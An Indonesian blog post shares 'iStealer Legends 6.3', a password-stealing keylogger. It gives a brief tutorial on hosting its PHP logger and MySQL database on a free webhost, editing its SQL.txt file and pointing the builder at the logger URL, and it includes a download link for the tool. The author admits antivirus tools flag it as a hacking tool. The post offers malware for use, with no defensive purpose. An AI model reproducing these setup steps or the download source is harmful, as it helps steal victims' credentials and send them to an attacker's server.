Selamat datang di website ini, Jika anda ingin melihat banyak informasi lebih jelas lagi, silakan search atau comment pada kotak yang sudah disediakan , Tapi ada baiknya kita mampir disitus JW.ORG/ID situs ini penuh dengan informasi menarik dari segala informasi. TRIMAKASIH ATAS KUNJUNGANNYA

Selasa, 17 Februari 2015

[Software] iStealer Legends 6.3 MOD php + sedikit Tutor - Thread Not Solved Yet


Kembalai lagi Dengan  website saya di Bima_blog, hehehe maaf sebelum nya ikut share ya gan .siapa yang ga tau 1 tools ini udah pasti banyak yg menggunakan

bagi yg blum punya dan yg punya tp gagal mencoba kita bahas dsni he he

author iStealer kalo ga salah Kizar Labs ga tau dr mana tuh orang hohoh....

apa sih iStealer ? ya udah banyak lah ye yg pake tools ini memang mantep gan cuman sedikit rada rumit dalam configuration nya soal nya menggunakan PHP and SQL database tp kl yang udah tau pasti Mudah lah

priview

pertama lu harus punya webhost buat upload php nya yg Support SQL database

contoh di 000webhost
kl dah log in di free webhost lu setting atau cari database my SQL create/buat nama database nya
paste Username SQL nya ke folder cari PHP MOD / PHP Logger di folder iStealer ada disana SQL.txt nah edit di sana kl udah ..

nama domaian anda apa contoh
misal nya www.alex.webatu.com/index.php buka d firefox anda

install beres deh nah link url tersebut input di iStealer php Logger configuration

inget gan nih software ke detek virus ngingetin aja ga ad tools iStealer/keylogger yang bersih he karena
ya software berbahaya nama nya juga hacking tools tp ga semua kok he

DOWNLOAD NYA
http://www.mediafire.com/?q93410w06egp84b

mohon maaf jiga tutor nya kl tidak di mengerti jika ada yang kurang mohon di tambahkan Jgn Pelit bro he he :axehead:

silakan diskusikan

0 Comment:

luvne.com resepkuekeringku.com desainrumahnya.com yayasanbabysitterku.com
?max-results="+numposts2+"&orderby=published&alt=json-in-script&callback=showrecentposts2\"><\/script>");

Web Statistik

TOP rank 1704 WORLD
Get Free Music at www.divine-music.info
Get Free Music at www.divine-music.info

Free Music at divine-music.info
Rating for bimaadevolan.blogspot.com

Blog Archive

logo

English French Spain Italian Dutch Russian Japanese Korean Chinese Simplified

footer social

Related Posts Plugin for WordPress, Blogger...
zwani.com myspace graphic comments
Diberdayakan oleh Blogger.
Loading...

Pages - Menu